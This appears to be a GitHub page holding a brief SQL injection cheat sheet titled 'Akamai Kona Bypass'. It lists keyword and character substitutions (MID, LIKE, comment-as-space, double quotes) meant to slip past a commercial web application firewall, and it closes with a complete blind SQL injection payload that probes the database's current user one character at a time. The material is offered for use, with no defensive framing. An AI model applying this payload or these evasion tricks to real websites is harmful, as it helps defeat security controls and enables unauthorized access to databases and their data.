Skip to content

Latest commit

 

History

History
15 lines (11 loc) · 268 Bytes

File metadata and controls

15 lines (11 loc) · 268 Bytes

SQLI

Akamai Kona Bypass

  • MID instead of SUBSTRING
  • LIKE instead of =
  • /**/ instead of a space
  • CURRENT_USER instead of CURRENT_USER()
  • " instead of '

Final example:

444/**/OR/**/MID(CURRENT_USER,1,1)/**/LIKE/**/"p"/**/#